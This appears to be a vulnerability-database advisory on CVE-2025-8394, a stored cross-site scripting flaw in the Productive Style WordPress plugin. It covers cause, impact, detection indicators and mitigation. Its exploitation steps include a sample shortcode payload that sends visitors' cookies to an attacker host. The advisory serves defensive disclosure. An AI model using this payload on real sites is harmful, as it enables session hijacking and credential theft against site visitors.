CVE-2025-8394
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-8394 is a Stored Cross-Site Scripting (XSS) vulnerability in the Productive Style plugin for WordPress, affecting all versions up to and including 1.1.23. The flaw exists in the display_productive_breadcrumb shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on September 17, 2025, and assigned a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability arises because the display_productive_breadcrumb shortcode does not properly sanitize or escape user-supplied shortcode attributes before rendering them in HTML output. An authenticated attacker with at least contributor-level access can embed malicious JavaScript within a shortcode attribute, which is then stored in the database and executed in the browser of any user who visits the affected page (Wordfence, ENISA EUVD).

Impact

Successful exploitation allows an authenticated attacker to inject persistent malicious scripts into WordPress pages, which execute in the context of any visitor's browser. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further attacks against site administrators. The CVSS scope is marked as "Changed," indicating the impact extends beyond the vulnerable component to affect other users' browsers (Wordfence).

Exploitability

No public proof-of-concept exploit code or in-the-wild exploitation has been reported for CVE-2025-8394. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at contributor level or above, which limits the attack surface. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, ENISA EUVD).

Exploitation steps

  1. Gain contributor access: Obtain or register a WordPress account with at least contributor-level privileges on the target site.
  2. Create or edit a post/page: Navigate to the WordPress editor and create or edit a post or page where shortcodes are permitted.
  3. Inject malicious shortcode: Insert the display_productive_breadcrumb shortcode with a crafted attribute containing a JavaScript payload, e.g., [display_productive_breadcrumb attribute="\"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  4. Publish the content: Submit or publish the post/page so the malicious shortcode is stored in the database.
  5. Trigger execution: When any user (including administrators) visits the injected page, the unsanitized attribute is rendered in the HTML and the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints containing shortcode content with suspicious HTML/script tags or encoded payloads within display_productive_breadcrumb shortcode attributes.
  • Database: Unexpected <script> tags or JavaScript event handlers stored in the wp_posts table within shortcode content associated with the Productive Style plugin.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages containing the display_productive_breadcrumb shortcode, potentially indicating cookie exfiltration.
  • File System: Review breadcrumb.php in the plugin directory (/wp-content/plugins/productive-style/includes/common/module/breadcrumb.php) for any unauthorized modifications (Wordfence).

Mitigation and workarounds

WordPress site administrators should update the Productive Style plugin to a version beyond 1.1.23 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. The vulnerability was disclosed by Wordfence on September 17, 2025; check the WordPress plugin repository for the latest patched version. As a workaround, restrict contributor-level user registrations and limit who can publish content containing shortcodes. Implementing a Web Application Firewall (WAF) with XSS rules can provide additional protection (Wordfence, WordPress Plugin Repo).

Community reactions

Wordfence included CVE-2025-8394 in its weekly WordPress vulnerability report for September 15–21, 2025, as part of routine disclosure coverage (Wordfence Blog). No significant independent researcher commentary, vendor statements beyond the initial advisory, or notable social media discussion has been identified for this vulnerability.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19848MEDIUM6.5
  • wp-user-avatar
NoYesAug 21, 2026
CVE-2026-17559MEDIUM5.3
  • content-protector
NoYesAug 21, 2026
CVE-2026-16650MEDIUM5.3
  • charitable
NoYesAug 21, 2026
CVE-2026-15150MEDIUM5.3
  • mycred
NoYesAug 21, 2026
CVE-2026-18356LOW3.7
  • limit-login-attempts-reloaded
NoYesAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management